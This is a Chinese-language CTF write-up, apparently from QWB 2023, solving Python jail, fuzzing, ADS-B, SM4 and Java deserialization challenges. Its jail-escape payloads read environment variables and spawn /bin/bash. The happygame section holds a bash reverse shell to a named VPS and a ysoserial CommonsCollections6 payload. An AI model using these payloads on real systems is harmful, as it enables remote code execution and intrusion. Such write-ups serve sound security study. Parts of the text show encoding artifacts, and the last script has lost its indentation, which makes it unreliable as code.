【Misc】
Pyjail ! It’s myFILTER !!!
nc連接后我們先來看看
┌──(root?penetration)-[/]
└─# nc 8.147.129.5 40072
_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _
| __ \ (_) (_) | | | |_ _| | ( ) | ____|_ _| | |__ __| ____| __ \ | | |
| |__) | _ _ __ _ _| | | | | | | |_|/ ___ _ __ ___ _ _| |__ | | | | | | | |__ | |__) | | | |
| ___/ | | || |/ _` | | | | | | | | __| / __| | '_ ` _ \| | | | __| | | | | | | | __| | _ / | | |
| | | |_| || | (_| | | | |_| _| |_| |_ \__ \ | | | | | | |_| | | _| |_| |____| | | |____| | \ \ |_|_|
|_| \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_| |_____|______|_| |______|_| \_\ (_|_)
__/ |/ | __/ |
|___/__/ |___/
Python Version:python3.10
Source Code:
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    """Stub that replaces every banned callable.

    Whatever arguments the caller passes are ignored; a fixed notice is
    printed and None is returned, so the original operation never runs.
    """
    notice = "Player! It's already banned!"
    print(notice)
# Swap the usual process-spawning and introspection entry points for the stub,
# then drop the module handles so those names are no longer reachable from the
# jail's namespace.  (`attr` is not a builtin; that assignment only creates a
# harmless extra global.)
pty.spawn = os.system = os.popen = blacklist_fun_callback
subprocess.Popen = subprocess.call = blacklist_fun_callback
code.interact = code.compile_command = blacklist_fun_callback
vars = attr = dir = getattr = exec = blacklist_fun_callback
__import__ = compile = breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
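# Substrings rejected by my_filter().
# Fix: the original list had no comma after "getattr", so Python's implicit
# literal concatenation merged it with the next entry into the single string
# "getattr__import__"; neither "getattr" nor "__import__" was matched on its
# own.  The comma is restored, giving 42 separate entries.
blacklist_words = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr",
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]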
def my_filter(input_code):
    """Return False if any entry of blacklist_words occurs in input_code, else True."""
    hits = (word in input_code for word in blacklist_words)
    return not any(hits)
# Every gate must hold before the text is evaluated: it must contain an
# f-string replacement field ('{' and '}'), be pure ASCII, pass the blacklist,
# not mention "eval", and be shorter than 65 characters.  Each pass evaluates
# the text as an f-string and feeds the result back in.
while (
    '{' in input_code
    and '}' in input_code
    and input_code.isascii()
    and my_filter(input_code)
    and "eval" not in input_code
    and len(input_code) < 65
):
    input_code = eval(f"f'{input_code}'")
# The loop has no break, so leaving it always lands here (same as the
# original while/else).
print("Player! Please obey the filter rules which I set!")
Can u input your code to escape >
? 分析一下:
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    """Stub that replaces every banned callable.

    Whatever arguments the caller passes are ignored; a fixed notice is
    printed and None is returned, so the original operation never runs.
    """
    notice = "Player! It's already banned!"
    print(notice)
# Swap the usual process-spawning and introspection entry points for the stub,
# then drop the module handles so those names are no longer reachable from the
# jail's namespace.  (`attr` is not a builtin; that assignment only creates a
# harmless extra global.)
pty.spawn = os.system = os.popen = blacklist_fun_callback
subprocess.Popen = subprocess.call = blacklist_fun_callback
code.interact = code.compile_command = blacklist_fun_callback
vars = attr = dir = getattr = exec = blacklist_fun_callback
__import__ = compile = breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
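# Substrings rejected by my_filter().
# Fix: the original list had no comma after "getattr", so Python's implicit
# literal concatenation merged it with the next entry into the single string
# "getattr__import__"; neither "getattr" nor "__import__" was matched on its
# own.  The comma is restored, giving 42 separate entries.
blacklist_words = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr",
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]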
def my_filter(input_code):
    """Return False if any entry of blacklist_words occurs in input_code, else True."""
    hits = (word in input_code for word in blacklist_words)
    return not any(hits)
# Every gate must hold before the text is evaluated: it must contain an
# f-string replacement field ('{' and '}'), be pure ASCII, pass the blacklist,
# not mention "eval", and be shorter than 65 characters.  Each pass evaluates
# the text as an f-string and feeds the result back in.
while (
    '{' in input_code
    and '}' in input_code
    and input_code.isascii()
    and my_filter(input_code)
    and "eval" not in input_code
    and len(input_code) < 65
):
    input_code = eval(f"f'{input_code}'")
# The loop has no break, so leaving it always lands here (same as the
# original while/else).
print("Player! Please obey the filter rules which I set!")
? 主要目的是創建一個安全的環境,讓用戶在其中執行他們的代碼,同時防止他們執行可能會破壞系統或獲取敏感信息的代碼。
-
首先導(dǎo)入了一些Python模塊,如
code
,os
,subprocess
和pty
,然后定義了一個名為blacklist_fun_callback
的函數(shù),該函數(shù)只是打印一條消息,表示某個功能已被禁用。 -
然后,將一些可能被惡意利用的函數(shù)和方法(如
os.system
,os.popen
,subprocess.Popen
,subprocess.call
等)替換為blacklist_fun_callback
,如果用戶試圖使用這些函數(shù),他們只會看到一條消息,而不會實際執(zhí)行任何操作。 -
接下來,刪除了所有引用的模塊和
blacklist_fun_callback
函數(shù),以防止用戶直接訪問它們。 -
然后,提示用戶輸入他們想要執(zhí)行的代碼,并將其存儲在
input_code
變量中。 -
然后定義了一個名為
blacklist_words
的列表,其中包含一些可能被惡意利用的關(guān)鍵字。 -
my_filter
函數(shù)接受用戶輸入的代碼,并檢查它是否包含blacklist_words
列表中的任何關(guān)鍵字。如果包含,函數(shù)返回False
,否則返回True
。 -
在一個while循環(huán)中執(zhí)行用戶的代碼,只要它滿足一些條件(如不包含
{
或}
,是ASCII字符,不包含blacklist_words
列表中的任何關鍵字,長度小于65等)。如果用戶的代碼不滿足這些條件,代碼將打印一條消息,提示用戶遵守過濾規則。
? 然后嘗試了好多方法,后來想著能不能直接讀取環境變量,因為我自己出題的時候就經常忘記把環境變量flag=not flag
。最后payload:
{print(open("/proc/1/environ").read())}
easyfuzz
┌──(root?penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes):
? 一開始我也沒明白什么意思,然后隨便輸了點(diǎn)東西
┌──(root?penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes):
? 大致明白了是要跟000000000
相同的位數(shù):
┌──(root?penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 222222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): df2222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 111111111
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes):
? 發(fā)現(xiàn)規(guī)律是前面兩個可以是任意的字母或數(shù)字,后面就要一個個去試了
xxqwbGood
qwb{YouKnowHowToFuzz!}
諜影重重2.0
? 提供了一個attach.pcapng
文件,根據題目內容以及通過觀察數據包的話是ADS-B數據解析。
? 為了方便處理我們把它轉(zhuǎn)換成JSON
格式
? 在ADS-B (Automatic Dependent Surveillance-Broadcast) 系統中,飛機廣播的信息被編碼為多種不同的消息類型,每種類型的消息都有一個特定的類型碼(Type Code)。這些類型碼用于區分消息中包含的數據類型,例如飛機的身份、位置、速度等。
? 根據(jù)ADS-B協(xié)議的規(guī)范來的。具體來說:
- 類型碼19通常用于表示地面速度信息。
- 類型碼20到22用于表示空中速度信息。
? 這些類型碼定義了消息中包含的數(shù)據(jù)字段,以及如何解析這些字段以獲取飛機(jī)的速度和航向等信息。
? 這些信息通常可以在ADS-B協議的官方文檔或相關的航空通信標準文檔中找到。例如,ICAO(國際民用航空組織)的文檔就詳細描述了ADS-B消息的格式和內容,包括不同類型碼的含義。
? 在處理ADS-B數據時,解析器會根據這些類型碼來解析消息內容,并提取出相應的飛機速度信息。因此,通過檢查類型碼來確定哪些消息包含了速度信息,并據此提取和分析數據。
import json
import pyModeS as pms
import hashlib
# Load the JSON export of the capture.  Assumes the tshark `-T json` layout:
# one object per packet with a `_source` -> `layers` mapping — confirm against
# the file if a different exporter was used.
with open('attach.json', 'r', encoding='utf-8') as file:
    data = json.load(file)

# Hex payload of every TCP segment, with the ':' separators stripped.
info = []
for packet in data:
    source = packet['_source']
    if 'layers' not in source or 'tcp' not in source['layers']:
        continue
    tcp_layer = source['layers']['tcp']
    if 'tcp.payload' in tcp_layer:
        tcp_payload = tcp_layer['tcp.payload'].replace(':', '')
        info.append(tcp_payload)
# One record per velocity message: ICAO address plus decoded speed/track/
# vertical rate.  Type codes 19..22 are the airborne velocity messages.
planes_data = []
for i in info:
    # The first 18 hex characters (9 bytes) are skipped as feed framing;
    # the remainder is the Mode S / ADS-B message.  NOTE(review): the 9-byte
    # framing length is taken from the original script — verify against the
    # capture if decoding fails.
    msg = i[18:]
    typecode = pms.adsb.typecode(msg)
    if 19 <= typecode <= 22:
        icao = pms.adsb.icao(msg)
        velocity_info = pms.adsb.velocity(msg)
        # pyModeS returns a 4-tuple here; the last element is not used.
        speed, track, vertical_rate, _ = velocity_info
        plane_info = dict(
            icao=icao,
            speed=speed,
            track=track,
            vertical_rate=vertical_rate,
        )
        planes_data.append(plane_info)
# Flag = MD5 of the upper-cased ICAO address of the fastest aircraft seen.
# max() keeps the first record on ties, matching the original behaviour.
# Raises ValueError if no velocity message was decoded (planes_data empty).
fastest_plane = max(planes_data, key=lambda plane: plane['speed'])
digest = hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest()
print(f"flag{{{digest}}}")
簽到
flag{welcome_to_qwb_2023}
Pyjail ! It’s myRevenge !!!
┌──(root?penetration)-[/]
└─# nc 8.147.133.154 29942
_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _
| __ \ (_) (_) | | | |_ _| | ( ) | ____|_ _| | |__ __| ____| __ \ | | |
| |__) | _ _ __ _ _| | | | | | | |_|/ ___ _ __ ___ _ _| |__ | | | | | | | |__ | |__) | | | |
| ___/ | | || |/ _` | | | | | | | | __| / __| | '_ ` _ \| | | | __| | | | | | | | __| | _ / | | |
| | | |_| || | (_| | | | |_| _| |_| |_ \__ \ | | | | | | |_| | | _| |_| |____| | | |____| | \ \ |_|_|
|_| \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_| |_____|______|_| |______|_| \_\ (_|_)
__/ |/ | __/ |
|___/__/ |___/
Python Version:python3.10
Source Code:
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    """Stub that replaces every banned callable.

    Whatever arguments the caller passes are ignored; a fixed notice is
    printed and None is returned, so the original operation never runs.
    """
    notice = "Player! It's already banned!"
    print(notice)
# Swap the usual process-spawning and introspection entry points for the stub,
# then drop the module handles so those names are no longer reachable from the
# jail's namespace.  (`attr` is not a builtin; that assignment only creates a
# harmless extra global.)
pty.spawn = os.system = os.popen = blacklist_fun_callback
subprocess.Popen = subprocess.call = blacklist_fun_callback
code.interact = code.compile_command = blacklist_fun_callback
vars = attr = dir = getattr = exec = blacklist_fun_callback
__import__ = compile = breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
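# Substrings rejected by my_filter().
# Fix: the original list had no comma after "getattr", so Python's implicit
# literal concatenation merged it with the next entry into the single string
# "getattr__import__"; neither "getattr" nor "__import__" was matched on its
# own.  The comma is restored, giving 42 separate entries.
blacklist_words_var_name_fake_in_local_real_in_remote = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr",
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]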
def my_filter(input_code):
    """Return False if any blacklisted substring occurs in input_code, else True."""
    hits = (word in input_code for word in blacklist_words_var_name_fake_in_local_real_in_remote)
    return not any(hits)
# Every gate must hold before the text is evaluated: it must contain an
# f-string replacement field ('{' and '}'), be pure ASCII, pass the blacklist,
# not mention "eval", and be shorter than 65 characters.  Each pass evaluates
# the text as an f-string and feeds the result back in.
while (
    '{' in input_code
    and '}' in input_code
    and input_code.isascii()
    and my_filter(input_code)
    and "eval" not in input_code
    and len(input_code) < 65
):
    input_code = eval(f"f'{input_code}'")
# The loop has no break, so leaving it always lands here (same as the
# original while/else).
print("Player! Please obey the filter rules which I set!")
Can u input your code to escape >
? 先來分析一下:
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    """Stub that replaces every banned callable.

    Whatever arguments the caller passes are ignored; a fixed notice is
    printed and None is returned, so the original operation never runs.
    """
    notice = "Player! It's already banned!"
    print(notice)
# Swap the usual process-spawning and introspection entry points for the stub,
# then drop the module handles so those names are no longer reachable from the
# jail's namespace.  (`attr` is not a builtin; that assignment only creates a
# harmless extra global.)
pty.spawn = os.system = os.popen = blacklist_fun_callback
subprocess.Popen = subprocess.call = blacklist_fun_callback
code.interact = code.compile_command = blacklist_fun_callback
vars = attr = dir = getattr = exec = blacklist_fun_callback
__import__ = compile = breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
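# Substrings rejected by my_filter().
# Fix: the original list had no comma after "getattr", so Python's implicit
# literal concatenation merged it with the next entry into the single string
# "getattr__import__"; neither "getattr" nor "__import__" was matched on its
# own.  The comma is restored, giving 42 separate entries.
blacklist_words_var_name_fake_in_local_real_in_remote = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr",
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]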
def my_filter(input_code):
    """Return False if any blacklisted substring occurs in input_code, else True."""
    hits = (word in input_code for word in blacklist_words_var_name_fake_in_local_real_in_remote)
    return not any(hits)
# Every gate must hold before the text is evaluated: it must contain an
# f-string replacement field ('{' and '}'), be pure ASCII, pass the blacklist,
# not mention "eval", and be shorter than 65 characters.  Each pass evaluates
# the text as an f-string and feeds the result back in.
while (
    '{' in input_code
    and '}' in input_code
    and input_code.isascii()
    and my_filter(input_code)
    and "eval" not in input_code
    and len(input_code) < 65
):
    input_code = eval(f"f'{input_code}'")
# The loop has no break, so leaving it always lands here (same as the
# original while/else).
print("Player! Please obey the filter rules which I set!")
? 大致可以是一個安全性過濾器,它的主要目的是防止用戶執行一些可能會對系統造成危害的操作。這是通過在代碼中禁止一些可能會被惡意利用的函數和模塊來實現的。
? 首先,定義了一個名為blacklist_fun_callback
的函數(shù),它會在被調(diào)用時打印一條消息。然后,將一些可能被惡意利用的函數(shù)和模塊,如os.system
、subprocess.Popen
等,都替換為這個函數(shù)。這樣,如果用戶試圖使用這些函數(shù)或模塊,就會失敗,而只會看到定義的消息。
? 接下來,定義了一個名為blacklist_words_var_name_fake_in_local_real_in_remote
的列表,其中包含了一些可能會被惡意利用的關(guān)鍵詞。這些關(guān)鍵詞包括一些可能會被用來執(zhí)行惡意代碼的函數(shù)名、模塊名和路徑等。
? 然后,定義了一個名為my_filter
的函數(shù),它會檢查用戶輸入的代碼中是否包含這些關(guān)鍵詞。如果包含,函數(shù)將返回False,否則返回True。
? 最后,使用一個while循環來接收并處理用戶的輸入。只有當用戶的輸入滿足所有的條件(不包含大括號,只包含ASCII字符,不包含黑名單中的關鍵詞,長度小于65,且不包含"eval")時,輸入的代碼才會被執行。否則,將打印一條消息提示用戶遵守過濾規則。
? 目標很明確,就是繞過代碼中的安全過濾器,利用Python的動態特性和字符串格式化來繞過過濾器的限制以執行任意代碼并最終獲取shell訪問。
? 首先可以清空blacklist_words_var_name_fake_in_local_real_in_remote
列表,my_filter
函數(shù)就不會再過濾任何輸入。假設(shè)黑名單被清空,那么此時就可以使用eval
函數(shù),為了保險起見要通過拼接字符串來獲取eval
函數(shù),繞過直接使用eval
關(guān)鍵詞的限制。然后通過__import__
函數(shù)導(dǎo)入os
模塊繞過直接使用os
關(guān)鍵詞的限制,使用os.execv
函數(shù)執(zhí)行/bin/bash
打開一個新的bash shell
。最后payload:
{list(locals().values())[-2].clear()}'+'\"{'+'in'+'put()'+'}\"
{__builtins__.__dict__["ev"+"al"](input())}
{__builtins__.__dict__["__import__"]("os").execv("/bin/bash",["/bin/bash"])}
server_8F6C72124774022B.py
import code, os, subprocess
import pty
# ASCII-art banner printed on connect.  Kept as a plain (non-raw) literal like
# the original: the backslashes in the art are not valid escapes and are
# preserved verbatim by Python 3.10.
WELCOME = """
_____ _ _ _ _ _____ _ _ ______ _____ _ _______ ______ _____ _ _
| __ \ (_) (_) | | | |_ _| | ( ) | ____|_ _| | |__ __| ____| __ \ | | |
| |__) | _ _ __ _ _| | | | | | | |_|/ ___ _ __ ___ _ _| |__ | | | | | | | |__ | |__) | | | |
| ___/ | | || |/ _` | | | | | | | | __| / __| | '_ ` _ \| | | | __| | | | | | | | __| | _ / | | |
| | | |_| || | (_| | | | |_| _| |_| |_ \__ \ | | | | | | |_| | | _| |_| |____| | | |____| | \ \ |_|_|
|_| \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_| |_____|______|_| |______|_| \_\ (_|_)
__/ |/ | __/ |
|___/__/ |___/
"""

# Source listing shown to the player.  This is display text only: the
# blacklist name in it differs from the real one defined further down, and
# the text itself is never executed.
SOURCE_CODE = """
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
print("Player! It's already banned!")
pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback
vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")
blacklist_words_var_name_fake_in_local_real_in_remote = [
"subprocess",
"os",
"code",
"interact",
"pty",
"pdb",
"platform",
"importlib",
"timeit",
"imp",
"commands",
"popen",
"load_module",
"spawn",
"system",
"/bin/sh",
"/bin/bash",
"flag",
"eval",
"exec",
"compile",
"input",
"vars",
"attr",
"dir",
"getattr"
"__import__",
"__builtins__",
"__getattribute__",
"__class__",
"__base__",
"__subclasses__",
"__getitem__",
"__self__",
"__globals__",
"__init__",
"__name__",
"__dict__",
"._module",
"builtins",
"breakpoint",
"import",
]
def my_filter(input_code):
for x in blacklist_words_var_name_fake_in_local_real_in_remote:
if x in input_code:
return False
return True
while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
input_code = eval(f"f'{input_code}'")
else:
print("Player! Please obey the filter rules which I set!")
"""
def blacklist_fun_callback(*args):
    """Stub that replaces every banned callable.

    Whatever arguments the caller passes are ignored; a fixed notice is
    printed and None is returned, so the original operation never runs.
    """
    notice = "Player! It's already banned!"
    print(notice)
# Swap the usual process-spawning and introspection entry points for the stub,
# then drop the module handles so those names are no longer reachable from the
# jail's namespace.  (`attr` is not a builtin; that assignment only creates a
# harmless extra global.)
pty.spawn = os.system = os.popen = blacklist_fun_callback
subprocess.Popen = subprocess.call = blacklist_fun_callback
code.interact = code.compile_command = blacklist_fun_callback
vars = attr = dir = getattr = exec = blacklist_fun_callback
__import__ = compile = breakpoint = blacklist_fun_callback
del os, subprocess, code, pty, blacklist_fun_callback

# Banner, interpreter version and the display-only source, then the prompt.
print(WELCOME)
print("Python Version:python3.10")
print("Source Code:")
print(SOURCE_CODE)
input_code = input("Can u input your code to escape > ")
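# Substrings rejected by my_filter().  The name is deliberately unlike the
# one shown in SOURCE_CODE.
# Fix: the original list had no comma after "getattr", so Python's implicit
# literal concatenation merged it with the next entry into the single string
# "getattr__import__"; neither "getattr" nor "__import__" was matched on its
# own.  The comma is restored, giving 42 separate entries.
b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120 = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr",
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]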
def my_filter(input_code):
    """Return False if any blacklisted substring occurs in input_code, else True."""
    banned = b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120
    hits = (word in input_code for word in banned)
    return not any(hits)
# Every gate must hold before the text is evaluated: it must contain an
# f-string replacement field ('{' and '}'), be pure ASCII, pass the blacklist,
# not mention "eval", and be shorter than 65 characters.  Each pass evaluates
# the text as an f-string and feeds the result back in.
while (
    '{' in input_code
    and '}' in input_code
    and input_code.isascii()
    and my_filter(input_code)
    and "eval" not in input_code
    and len(input_code) < 65
):
    input_code = eval(f"f'{input_code}'")
# The loop has no break, so leaving it always lands here (same as the
# original while/else).
print("Player! Please bypass my filter !")
問卷調(diào)查
flag{see_you_again_qwb_s8}
【Reverse】
ezre
? 一開始想隨便看看的,但是后來發(fā)現(xiàn)了什么
這不就是SM4加密
? 密鑰:
01 23 45 67 89 AB CD EF 01 23 45 67 89 AB CD EF
? 密文:
06 75 19 47 16 63 88 7C
8B 66 55 FF 3F 7D 0D 4A
F5 D2 4E 38 3F E9 C2 DE
DB 7C 7F 6F 74 B1 1F 3C
? 解密:
66 6c 61 67 7b 68 33 6b 6b 30 5f 77 30 72 6c 64 5f 73 75 72 33 5f 33 6e 30 75 67 68 7d 00 00 00
? 看到關(guān)鍵的666c
就是fl
的前綴了,十六進(jìn)制轉(zhuǎn)字符串:
flag{h3kk0_w0rld_sur3_3n0ugh}
【Web】
happygame
? 這里要用到這個工具:https://github.com/Y4er/ysoserial,https://jitpack.io/com/github/Y4er/ysoserial/main-SNAPSHOT/ysoserial-main-SNAPSHOT.jar,還有grpcui.exe
。然后順帶準(zhǔn)備一臺VPS(139.159.215.68)。
/bin/bash -i >& /dev/tcp/139.159.215.68/6767 0>&1
base64編碼:
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==
? 然后:
CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"
┌──(root?penetration)-[/]
└─# java -jar ysoserial-main-cff1edf282-1.jar CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGliYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtSUM5a1pYWXZkR053THpFek9TNHhOVGt1TWpFMUxqWTRMelkzTmpjZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==
? Terminal執(zhí)行:
grpcui.exe -plaintext 8.147.129.191:26804
? 選擇Raw Request
,Request payload
:
{"serializeData": "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"}
? VPS上進(jìn)行監(jiān)聽:
root@ecs-74b2:~# nc -lvnp 6767
Listening on 0.0.0.0 6767
? 然后點(diǎn)擊Invoke
? 回到服務(wù)器上就可以正常反彈shell了:
【強網先鋒】
石頭剪刀布
? 從sklearn.naive_bayes
中的MultinomialNB
中看出是樸素貝葉斯分類器,用于訓(xùn)練模型。
from pwn import *
# Single TCP session to the challenge service (pwntools tube).
p = remote(host="8.147.131.39", port=28434)
def Z():
    """Drain whatever the service has printed, then send move 0."""
    p.recv()
    p.sendline(b"0")
def O():
    """Drain whatever the service has printed, then send move 1."""
    p.recv()
    p.sendline(b"1")
def T():
    """Drain whatever the service has printed, then send move 2."""
    p.recv()
    p.sendline(b"2")
# Fixed play-book: the Z/O/T calls below send moves 0/1/2 in a hard-coded
# order, then the service's reply is read and printed and one more move (2)
# is sent.
# NOTE(review): indentation was lost in this listing, so it is not visible
# whether the trailing recv/print/sendline statements sit inside the
# `while True:` body or after it; the loop has no break, so if they are
# outside they are unreachable — confirm against the original script.
while True:
Z()
Z()
Z()
Z()
Z()
O()
O()
T()
T()
